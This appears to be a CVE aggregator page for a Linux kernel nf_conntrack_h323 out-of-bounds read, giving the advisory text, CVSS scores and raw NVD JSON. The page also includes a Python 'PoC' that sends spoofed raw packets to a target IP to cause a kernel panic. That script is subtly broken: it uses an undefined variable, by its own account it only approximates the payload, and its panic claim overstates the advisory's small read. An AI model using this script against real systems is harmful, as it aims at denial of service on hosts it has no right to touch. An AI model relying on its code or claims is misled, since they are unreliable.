Security Vulnerability Report
中文
CVE-2026-23456 CVSS 8.2 HIGH

CVE-2026-23456

Published: 2026-04-03 16:16:32
Last Modified: 2026-04-27 14:16:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_h323: fix OOB read in decode_int() CONS case In decode_int(), the CONS case calls get_bits(bs, 2) to read a length value, then calls get_uint(bs, len) without checking that len bytes remain in the buffer. The existing boundary check only validates the 2 bits for get_bits(), not the subsequent 1-4 bytes that get_uint() reads. This allows a malformed H.323/RAS packet to cause a 1-4 byte slab-out-of-bounds read. Add a boundary check for len bytes after get_bits() and before get_uint().

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < 6.8
Linux Kernel < 6.6
Linux Kernel < 6.1
Linux Kernel < 5.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-23456: Linux Kernel nf_conntrack_h323 OOB Read This script sends a crafted H.323/RAS packet to trigger the kernel panic. Target: Linux system with nf_conntrack_h323 module loaded and listening on port 1719. """ import socket import struct import sys def create_malformed_h323_packet(): """ Constructs a basic UDP packet with a payload designed to trigger the OOB read in the decode_int() CONS case. Note: Specific H.323 ASN.1 structure is approximated to demonstrate the concept. """ # UDP Header (Source Port: 12345, Dest Port: 1719 - RAS) src_port = 12345 dst_port = 1719 udp_header = struct.pack('!HHHH', src_port, dst_port, 8, 0) # Length 8, Checksum 0 # Malformed Payload # The goal is to hit the CONS case where get_bits reads a length, # but the buffer is too short for get_uint. # We inject a length byte that claims more data exists. payload = b'\x27\x00' # Generic H.323 header start payload += b'\x04' # Tag potentially leading to CONS decode payload += b'\xFF' # Malformed length indicator return udp_header + payload def send_packet(target_ip): try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # IP Header construction ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version/HL 0, # TOS 20 + 8 + len(payload), # Total Length 12345, # ID 0, # Frag 64, # TTL 17, # Protocol (UDP) 0, # Checksum (0 for raw socket calc) socket.inet_aton("192.168.1.100"), # Src IP (spoofed) socket.inet_aton(target_ip)) # Dst IP packet = ip_header + create_malformed_h323_packet() sock.sendto(packet, (target_ip, 0)) print(f"[+] Malformed packet sent to {target_ip}") except PermissionError: print("[-] Error: Raw sockets require root privileges.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <TARGET_IP>") else: send_packet(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23456", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:32.300", "lastModified": "2026-04-27T14:16:34.073", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_h323: fix OOB read in decode_int() CONS case\n\nIn decode_int(), the CONS case calls get_bits(bs, 2) to read a length\nvalue, then calls get_uint(bs, len) without checking that len bytes\nremain in the buffer. The existing boundary check only validates the\n2 bits for get_bits(), not the subsequent 1-4 bytes that get_uint()\nreads. This allows a malformed H.323/RAS packet to cause a 1-4 byte\nslab-out-of-bounds read.\n\nAdd a boundary check for len bytes after get_bits() and before\nget_uint()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "references": [{"url": "https://git.kernel.org/stable/c/1e3a3593162c96e8a8de48b1e14f60c3b57fca8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/41b417ff73a24b2c68134992cc44c88db27f482d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/52235bf88159a1ef16434ab49e47e99c8a09ab20", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/6bce72daeccca9aa1746e92d6c3d4784e71f2ebb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/774a434f8c9c8602a976b2536f65d0172a07f4d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/a2cd54b9348e485d338b3c132338a4410c99afaf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c95dc674ebf01ecfb40388b6facfc89b81fed3b7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fb6c3596823ec5dd09c2123340330d7448f51a59", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.